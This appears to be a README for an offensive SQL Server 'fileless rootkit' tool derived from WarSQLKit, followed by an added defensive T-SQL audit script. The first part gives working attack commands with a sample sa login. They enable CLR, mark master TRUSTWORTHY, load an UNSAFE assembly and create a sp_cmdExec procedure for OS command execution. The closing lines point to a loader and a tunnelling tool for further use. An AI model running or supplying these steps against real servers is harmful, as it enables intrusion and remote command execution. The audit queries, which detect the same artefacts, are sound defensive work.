The main goal is to do away with needing SSMS or Navicat to invoke sp_cmdExec.
This is an update of the original project ( https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit ).
The program is a slight modification of 狼师傅's tool (http://wolvez.club/2019/09/19/mssql-command-tool/).
./mssqlrootkit -s 3.3.3.155 -u sa -p Admin1314 -q "sp_configure 'clr enabled', 1;RECONFIGURE;ALTER DATABASE master SET TRUSTWORTHY ON;"
CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM 0x4D5A9... WITH PERMISSION_SET = UNSAFE;
./mssqlrootkit -s 3.3.3.155 -u sa -p Admin1314 -q 'CREATE PROCEDURE [dbo].[sp_cmdExec] @cmd NVARCHAR (MAX), @result NVARCHAR (MAX) OUTPUT AS EXTERNAL NAME [WarSQLKit].[StoredProcedures].[CmdExec];'
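The three-step loading sequence above leaves a fixed set of artefacts in the server's catalog views. The following T-SQL audit script is an added example and not part of WarSQLKit or the tool described here; it is meant for a DBA or responder checking an instance for each of those artefacts. It assumes a SQL Server 2016+ instance (for HASHBYTES over long varbinary) and should be run in each database of interest, since assemblies are per-database (the page loads them into master).

```sql
-- Added audit script (not project code): lists what the CLR loading sequence on this
-- page leaves behind. Run in each database (assemblies are scoped per database).

-- 1. Is CLR integration switched on? The page's first step runs sp_configure 'clr enabled', 1.
--    'clr strict security' exists on SQL Server 2017+ and is absent on older versions.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('clr enabled', 'clr strict security');

-- 2. Databases flagged TRUSTWORTHY; the ALTER DATABASE step sets this so an UNSAFE
--    assembly can be created without a signing key.
SELECT name, is_trustworthy_on, owner_sid
FROM sys.databases
WHERE is_trustworthy_on = 1;

-- 3. User-defined assemblies with UNSAFE or EXTERNAL_ACCESS permission sets
--    (CREATE ASSEMBLY ... WITH PERMISSION_SET = UNSAFE shows up here).
SELECT name, permission_set_desc, create_date, modify_date, clr_name
FROM sys.assemblies
WHERE is_user_defined = 1
  AND permission_set_desc IN ('UNSAFE_ACCESS', 'EXTERNAL_ACCESS');

-- 4. Procedures and functions bound to an EXTERNAL NAME, i.e. CLR entry points such as
--    [dbo].[sp_cmdExec] -> [WarSQLKit].[StoredProcedures].[CmdExec].
SELECT o.name AS object_name, o.type_desc, a.name AS assembly_name,
       m.assembly_class, m.assembly_method, o.create_date
FROM sys.assembly_modules AS m
JOIN sys.objects    AS o ON o.object_id   = m.object_id
JOIN sys.assemblies AS a ON a.assembly_id = m.assembly_id
WHERE a.is_user_defined = 1;

-- 5. SHA-256 of each loaded assembly's bytes, so the result can be compared against a
--    known sample (the 0x4D5A... blob from the CREATE ASSEMBLY statement).
SELECT a.name, HASHBYTES('SHA2_256', f.content) AS sha256, DATALENGTH(f.content) AS bytes
FROM sys.assembly_files AS f
JOIN sys.assemblies AS a ON a.assembly_id = f.assembly_id
WHERE a.is_user_defined = 1;
```

Any row from queries 3 or 4 in a database that is not expected to host CLR code, combined with TRUSTWORTHY being on, matches the footprint this page describes and deserves a look.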
I also hacked together a C# loader; use it as is.
Some usage ideas:
For example, uknowsec's command-line Frpc version: https://github.com/uknowsec/frpModify